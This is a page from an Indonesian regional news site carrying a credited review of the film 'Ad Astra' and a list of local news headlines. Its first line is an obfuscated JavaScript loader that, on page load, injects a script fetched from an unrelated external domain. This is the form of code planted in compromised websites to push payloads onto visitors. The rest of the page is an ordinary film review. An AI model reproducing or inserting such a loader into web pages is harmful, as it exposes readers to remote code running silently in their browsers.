(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Film

‘Ad Astra’: Kisah Persembunyian di Tengah-tengah Galaksi


JAKARTA, Anda tidak akan mendapatkan sebuah kisah spectacle luar biasa seperti Gravity dalam Ad Astra. Kalau Anda menginginkan sebuah petualangan mengasyikkan di luar angkasa seperti yang Anda lihat dalam The Martian atau Gravity, Ad Astra mungkin akan mengecewakan Anda. Tapi jika Anda tahu bagaimana kualitas James Gray sebagai sutradara, maka Anda tidak ingin melewatkan film ini.

Ad Astra mungkin “menipu” banyak penonton dengan covernya yang mengkilap tapi di dalamnya ada sebuah kisah tentang kerinduan, rasa sepi dan rasa ingin tahu. Singkatnya, apapun yang Anda inginkan dalam sebuah film science fiction yang apik.

Dalam sebuah masa depan yang akan datang, di mana manusia bisa bertamasya di Bulan dan menikmati Subway di sana, kita bertemu dengan Roy McBride (Brad Pitt), seorang astronot yang begitu tenang dalam menghadapi semua masalah dalam hidup ini. Bahkan terlalu tenang. Meskipun ada bencana terjadi yang membuatnya terlontar dari luar angkasa sampai jatuh ke Bumi, Roy tetap cool. Dan dia bisa menjawab pertanyaan-pertanyaan bosnya dengan lancar setelahnya.

Tentu saja absennya rasa panik dalam diri Roy mengindikasikan ada yang salah dengan dia. Dalam narasinya kita mendengar isi kepala Roy. Betapa dia ingin terlihat normal, being present terhadap kekasihnya (Liv Tyler yang kembali menjadi pacar sang astronot setelah Armageddon) dan tidak terjebak dengan masa lalu.

Tapi itulah yang terjadi. Ayahnya, Clifford McBride (Tommy Lee Jones), menjadi kapten dalam sebuah misi bernama Project Lima. Objektif dari misi tersebut adalah untuk mencari bukti keberadaan makhluk lain di luar angkasa. Pembuktian bahwa manusia tidak sendiri. Dan ayahnya menghilang tiga puluh tahun lalu. Misi tersebut gagal dan Roy masih terbayang-bayang atas sosok ayahnya yang tidak pernah ada dalam hidupnya.

Tapi kemudian ada info baru. Ada fenomena the surge di mana listrik tiba-tiba terpengaruh oleh sebuah gelombang besar yang asalnya dari Neptunus, yang kebetulan ada lokasi terakhir Clifford sebelum komunikasi terputus. Dan bos Roy meminta Roy untuk pergi ke Mars dan berkomunikasi dengan ayahnya karena insiden the surge ini membahayakan nasib semua orang yang ada di Bumi. Tapi kemudian kejutan baru muncul. Bahwa sebenarnya ada kemungkinan bahwa Clifford masih hidup. Roy pun akhirnya memasang seragam astronotnya dan siap menjelajah bintang-bintang.

Jika Anda mencintai Brad Pitt dalam Once Upon A Time In Hollywood, Anda akan mencintainya juga dalam Ad Astra. Di umurnya yang 55 tahun, Brad Pitt sekali lagi membuktikan bahwa dia adalah salah satu aktor kelas A Hollywood yang memang terbukti mempunyai bakat akting yang luar biasa selain anugerah fisik yang sempurna.

Ad Astra adalah jenis film di mana aktor utamanya harus bisa berakting dengan baik karena film ini 100% mengenai karakter tersebut. Hampir setiap scene ada Roy McBride. Dan karakter ini jarang berbicara. Kita bisa menilai karakternya berdasarkan apa yang dia lakukan. Dan Brad Pitt sanggup menterjemahkan ini dengan sangat baik.

Perhatikan bagaimana Brad Pitt berkomunikasi tanpa dialog, menatap lautan bintang dengan mata berkaca-kaca. Atau bagaimana Brad Pitt dan Tommy Lee Jones bertemu dan dengan minimnya dialog penonton bisa merasakan berbagai macam emosi yang keduanya rasakan saat itu. Pahit, getir, kecewa, bahagia, sendu, sedih dan senang bercampur jadi satu. Ad Astra adalah milik Brad Pitt seorang dan untungnya dia punya James Gray sebagai sutradara.

Seperti halnya kebanyakan sutradara yang andal, Gray tahu bagaimana cara mempersembahkan film ini. Bersama dengan Ethan Gross, Gray mengajak kita ke dalam sebuah perjalanan emosional yang melelahkan namun sangat memuaskan. Plotnya, tentang hubungan ayah dan anak, mungkin terasa familiar. Banyak film yang sudah membahas tema ini. Tapi Gray dan Gross tahu bagaimana cara menjalankan cerita ini dengan mantap.

Kalau Anda menonton Gravity, menyaksikan Sandra Bullock terbang mengawang sendirian tanpa arah di luar angkasa terasa seperti mimpi buruk. Dalam Ad Astra, Gray dan Gross bisa menjadikan adegan tersebut tentang gambaran orang-orang yang tersiksa. Orang-orang yang ingin bersembunyi di tengah gelapnya angkasa karena obsesi/trauma yang mereka rasakan.

Direkam menggunakan film, presentasi Ad Astra sungguh mencengangkan. Tidak akan mengherankan jika Hoyte van Hoytema (yang merupakan sinematografer Interstellar) akan mendapatkan nominasi Oscar dalam kategori Best Cinematography tahun depan. Visualnya tidak hanya indah tapi juga memabukkan.

Membuat Anda ingin juga tersesat dalam gelapnya galaksi. Warna-warna bertabrakan memberikan unsur magis. Dan untuk membuat visual tersebut seribu kali lebih magis, James Gray mengajak komposer Max Richter untuk mengiringi adegan. Rasanya seperti menonton sebuah pertunjukan seni kelas atas.

Pesawat luar angkasa bergerak di tengah-tengah galaksi, menyeberang dari satu planet ke planet lain, terasa seperti sebuah resital balet yang sangat aduhai. Di akhir film, ketika Roy akhirnya tenang duduk dan menyesap kopi, saya merasakan hal yang sama. Selama dua jam, James Gray mengajak saya untuk merasakan sebuah turbulensi emosi yang tidak terkendali dari awal sampai akhir film.

Tapi setelah James Gray menutupnya dengan sebuah konklusi yang optimis, seperti karakter utamanya, saya merasakan ketenangan. Film sci:fi yang bagus akan membuat Anda memikirkan tentang diri Anda sendiri, mengajak Anda untuk bercermin. Dan Ad Astra memberikan itu semua. (kmb/dtc)

Reporter : kmb/dtc
Editor : Chell

 


Desy Arfianty

Recent Posts

Soal Pungutan Acara Perpisahan Siswa, Ini Kata Ketua DPRD Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Dewan Perwakilan Rakyat Daerah (DPRD) Kota Banjarbaru menyikapi persoalan iuran kegiatan acara… Read More

2 jam ago

Pungutan Acara Perpisahaan Siswa, Begini Respon Wali Kota Aditya

KANALKALIMANTAN.COM, BANJARBARU – Menyikapi pungutan acara perpisahan siswa sekolah di Banjarbaru, Wali Kota Banjarbaru Aditya… Read More

3 jam ago

Orangtua Pusing, ‘Bermewah-mewahan’ Perpisahan Anak Sekolah di Banjarbaru

Kadisdik: Silakan Perpisahan di Sekolah dan Dilakukan dengan Sederhana Read More

14 jam ago

Bappedalitbang Banjar Gelar Rapat Pembahasan Data Indikator Makro Pembangunan RPJPD

KANALKALIMANTAN.COM, MARTAPURA – Badan Perencanaan Pembangunan Daerah, Penelitian dan Pengembangan (Bappedalitbang) Kabupaten Banjar melaksanakan rapat Pembahasan… Read More

14 jam ago

Pergantian Perwira di Polres Banjarmasin, Ini Nama dan Jabatannya

KANALKALIMANTAN.COM, BANJARMASIN - Sejumlah perwira menengah (Pamen) dan perwira pertama (Pama) di lingkungan Kepolisian Resor… Read More

14 jam ago

O2SN dan FLS2N 2024 SD MI Tingkat Kabupaten Kapuas Digelar

KANALKALIMANTAN.COM, KUALA KAPUAS - Ratusan pelajar tingkat SD/MI di Kabupaten Kapuas antusias mengikuti upacara pembukaan… Read More

15 jam ago

This website uses cookies.